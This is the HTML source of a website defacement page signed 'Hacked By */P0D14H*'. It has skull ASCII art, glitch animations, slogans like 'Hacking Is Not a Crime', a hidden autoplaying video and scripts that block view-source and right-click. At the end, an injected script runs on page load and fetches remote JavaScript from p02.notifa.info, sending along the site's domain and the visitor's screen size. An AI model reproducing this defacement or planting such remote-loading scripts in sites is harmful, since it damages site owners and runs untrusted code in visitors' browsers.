<!DOCTYPE html> 
<html> 
  <head> 
    <title>*/P0D14H*
    </title> 
    <meta name="description" content="Hacked By */P0D14H*"> 
    <link href="https://fonts.googleapis.com/css?family=Amatic+SC:400,700" rel="stylesheet">	
	<link rel="icon" type="image/x-icon" href="https://ih1.redbubble.net/image.294772538.6280/flat,800x800,075,f.u2.jpg">
    <embed src="http://www.youtube.com/v/Rl3V1d_tJpo&amp;autoplay=1&amp;loop=1&amp;playlist=WCw1gAJalK0" repeat=true autostart=true loop=TRUE width=0 height=0 align="CENTER">
    </embed>
  </center>	 
<link href="https://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet"> 	
<style type="text/css">	@import url('https://fonts.googleapis.com/css?family=Jolly+Lodger');
  body{
    background-image: url( https://i.pinimg.com/originals/2c/b8/ab/2cb8ab4aa36fc040dc4c34f1b4e3ba33.gif );
    background-color: white;
    background-repeat: no-repeat;
    background-attachment: fixed;
    background-size: 100% 100%;
  }
  .glitchtext {
    justify-content: center;
    align-items: center;
    display: flex;
  }
  .text {
    font-family: "Jolly Lodger";
    font-size: 19.5px;
    color: red;
    text-shadow: 0 0 12.5px lime;
    margin: 4%;
    margin-top: 2%;
  }
  .dud {
    color: lime;
  }
  h1 {
    color: white;
    font-family: "Jolly Lodger";
    font-size: 60px;
    font-weight: 400;
    text-align: center;
    margin: 0;
    line-height: 0;
    animation: glitch1 2.5s infinite;
  }
  h1:nth-child(2) {
    color: #67f3da;
    animation: glitch2 2.5s infinite;
  }
  h1:nth-child(3) {
    color: #f16f6f;
    animation: glitch3 2.5s infinite;
  }
  @keyframes glitch1 {
    0% {
      transform: none;
      opacity: 1;
    }
    7% {
      transform: skew(-0.5deg, -0.9deg);
      opacity: 0.75;
    }
    10% {
      transform: none;
      opacity: 1;
    }
    27% {
      transform: none;
      opacity: 1;
    }
    30% {
      transform: skew(0.8deg, -0.1deg);
      opacity: 0.75;
    }
    35% {
      transform: none;
      opacity: 1;
    }
    52% {
      transform: none;
      opacity: 1;
    }
    55% {
      transform: skew(-1deg, 0.2deg);
      opacity: 0.75;
    }
    50% {
      transform: none;
      opacity: 1;
    }
    72% {
      transform: none;
      opacity: 1;
    }
    75% {
      transform: skew(0.4deg, 1deg);
      opacity: 0.75;
    }
    80% {
      transform: none;
      opacity: 1;
    }
    100% {
      transform: none;
      opacity: 1;
    }
  }
  @keyframes glitch2 {
    0% {
      transform: none;
      opacity: 0.25;
    }
    7% {
      transform: translate(-2px, -3px);
      opacity: 0.5;
    }
    10% {
      transform: none;
      opacity: 0.25;
    }
    27% {
      transform: none;
      opacity: 0.25;
    }
    30% {
      transform: translate(-5px, -2px);
      opacity: 0.5;
    }
    35% {
      transform: none;
      opacity: 0.25;
    }
    52% {
      transform: none;
      opacity: 0.25;
    }
    55% {
      transform: translate(-5px, -1px);
      opacity: 0.5;
    }
    50% {
      transform: none;
      opacity: 0.25;
    }
    72% {
      transform: none;
      opacity: 0.25;
    }
    75% {
      transform: translate(-2px, -6px);
      opacity: 0.5;
    }
    80% {
      transform: none;
      opacity: 0.25;
    }
    100% {
      transform: none;
      opacity: 0.25;
    }
  }
  @keyframes glitch3 {
    0% {
      transform: none;
      opacity: 0.25;
    }
    7% {
      transform: translate(2px, 3px);
      opacity: 0.5;
    }
    10% {
      transform: none;
      opacity: 0.25;
    }
    27% {
      transform: none;
      opacity: 0.25;
    }
    30% {
      transform: translate(5px, 2px);
      opacity: 0.5;
    }
    35% {
      transform: none;
      opacity: 0.25;
    }
    52% {
      transform: none;
      opacity: 0.25;
    }
    55% {
      transform: translate(5px, 1px);
      opacity: 0.5;
    }
    50% {
      transform: none;
      opacity: 0.25;
    }
    72% {
      transform: none;
      opacity: 0.25;
    }
    75% {
      transform: translate(2px, 6px);
      opacity: 0.5;
    }
    80% {
      transform: none;
      opacity: 0.25;
    }
    100% {
      transform: none;
      opacity: 0.25;
    }
  }
</style> 
</head> 
<body> 
<script type='text/javascript'>
//<![CDATA[
//Script Redirect CTRL + U
//https://mastamvan.blogspot.com/ ganti dengan url blog kalian
function redirectCU(e) {
  if (e.ctrlKey && e.which == 85) {
    window.location.replace("No System Is Safe");
    return false;
  }
}
document.onkeydown = redirectCU;

//Script Redirect Klik Kanan
function redirectKK(e) {
  if (e.which == 3) {
    window.location.replace("No System Is Safe");
    return false;
  }
}
document.oncontextmenu = redirectKK;
//]]>
</script>
<br><br><br><br>
  <center>  <!-- https://image.ibb.co/htGcjz/Pierrotpng.png >> Logo Pierrot -->
    <!--<img src="http://i67.tinypic.com/dws660.jpg" height="250px" > 		-->
	
<pre style="font: 9px/9px monospace;"><font color="red" >
uuuuuuu
uu$$$$$$$$$$$uu
uu$$$$$$$$$$$$$$$$$uu
u$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$$$$$$$$$$$$$$$$$$$$u
u$$$$$$"   "$$$"   "$$$$$$u
"$$$$"      u$u       $$$$"
$$$u       u$u       u$$$
$$$u      u$$$u      u$$$
"$$$$uu$$$   $$$uu$$$$"
"$$$$$$$"   "$$$$$$$"
u$$$$$$$u$$$$$$$u
u$"$"$"$"$"$"$u
uuu        $$u$ $ $ $ $u$$       uuu
u$$$$        $$$$$u$u$u$$$       u$$$$
 $$$$$uu      "$$$$$$$$$"     uu$$$$$$
 u$$$$$$$$$$$uu    """""    uuuu$$$$$$$$$$
   $$$$"""$$$$$$$$$$uuu   uu$$$$$$$$$"""$$$"
"""      ""$$$$$$$$$$$uu ""$"""     
    uuuu ""$$$$$$$$$$uuu
    u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$
     $$$$$$$$$$""""           ""$$$$$$$$$$$"
      "$$$$$"                      ""$$$$""
       $$$"                         $$$$"
</font></pre> 
    <br>
    <br>
    <br>	 
    <div id="glitchtext"> 
      <h1>Hacked by */P0D14H*
      </h1> 
      <h1>Hacked by */P0D14H*
      </h1> 
      <h1>Hacked by */P0D14H*
      </h1> 
    </div>
    <br>
    <br>	 
	<font color="white" size="6" face="Jolly Lodger">
    { Nothing Is
    <font color="red" size="6" face="Jolly Lodger">
    Impossibel }<br>
      <font color="white">&#9760; Hacking Is </font><font color="red">Not a Crime &#9760;
      </font>     
    </font>
      <br>
      <font color="white" size="3" face="Jolly Lodger">
	  &copy;  2019
        <font color="red">
		
          <center>
            <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2oLazBXYNno97iW%2brHTx9vkwtxw7n1SUSHvqEMyLtOmsI3yIi36B9Pj88Ay8cY6D7cFmqUi8ck7CglPcXE%2fXNZTtCSa5ltPj47ZoMHD91gzT5S7HS24dYGOudL1EXpgD4gJskHuqJ6lFXUVGhfqv4KQknprmA3IOBuhT%2fUR%2fGZ2knm8y5Cl3tijd%2bztrWHOsWYD0C2WuGOfZLFXjhwGxzatZNEOYEKPzjeBidDMDzAsbn2cFcPz%2bHBSpFCN1LalzocGzKdAedTPZFxbzbreaCxFLmnYyCFld%2fEdA0yzbrC7BxNiJIooMAzSV%2fdISpMlm3P9gkhcV1ITff9RN3FrvLZy5YjWhbVkoBEQNA5k2N5yu%2bsa%2fYessnLpDeqp4l4hnbo7DKxpB2m5Yop%2f%2bAUuEOIDnCAvAwcOgS4J0puSMGMEuvUOGZVT6wffJGjisGVlai9RRBc6L98yN6qVFRInkYs97%2bWuTsLTpdbnONoNwi4rocwmc1h5nToa9pe84p9RM4aCrYrPLxSNbGjEEyMI82cA%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
          </html>
